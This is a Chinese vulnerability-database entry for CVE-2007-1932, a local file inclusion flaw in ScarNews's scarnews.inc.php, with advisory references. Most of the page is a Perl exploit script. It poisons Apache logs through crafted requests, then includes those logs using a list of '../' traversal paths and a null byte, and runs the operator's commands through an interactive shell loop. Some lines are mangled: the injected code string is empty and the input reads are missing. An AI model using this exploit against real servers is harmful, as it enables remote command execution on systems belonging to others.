ScarNews 'Scarnews.Inc.PHP' 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112649 漏洞类型 路径遍历
发布时间 2007-04-08 更新时间 2007-04-11
CVE编号 CVE-2007-1932 CNNVD-ID CNNVD-200704-169
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3687
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-169
|漏洞详情
ScarNews的scarnews.inc.php文件中存在目录遍历漏洞。远程攻击者可以借助sn_admin_dir参数中的..,包含和运行任意的本地文件。
|漏洞EXP
#Perl
#
#BeyazKurt
#
#ScarNews (sn_admin_dir) Local File Inclusion Exploit
#
# D0rk     : "Powered by ScarNews v1.2.1" dorka gerenk yok ama nese :p
# kodlad...m 2 scriptte di.er makinayla uctu :( :(
#
#Str0ke üzme kendini olur böle .eler :)
#
#Download : http://www.scar4u.de/scripts/scarnews/download.html
#
#Coded by elden ele geçio :)
#
# Shikaa get türkçe kas :D bi laf anlatcaz anlam.on a.g nese hotmail xss'leri sömür sömürebild.in #kadar :D
#
use IO::Socket;
use LWP::Simple;
#ripped
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
if (@ARGV < 3) {
print "
ScarNews (sn_admin_dir) Local File Inclusion Exploit
###############################################################
Kullan.m : exploit.pl [victim] [apachepath]
###############################################################
";
exit();
}
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];
print "Code is injecting in logfiles...\n";
$CODE="";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "user-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "If not working try another apache path\n\n";
print "[shell] ";$cmd = ;
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
#now include parameter
print $socket "GET ".$path."scarnews.inc.php?sn_admin_dir=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[shell] ";
$cmd = ;
}

# milw0rm.com [2007-04-08]
|参考资料

来源:VUPEN
名称:ADV-2007-1304
链接:http://www.frsirt.com/english/advisories/2007/1304
来源:MILW0RM
名称:3687
链接:http://www.milw0rm.com/exploits/3687
来源:XF
名称:scarnews-scarnewsinc-file-include(33492)
链接:http://xforce.iss.net/xforce/xfdb/33492
来源:BID
名称:23375
链接:http://www.securityfocus.com/bid/23375
来源:SECUNIA
名称:24796
链接:http://secunia.com/advisories/24796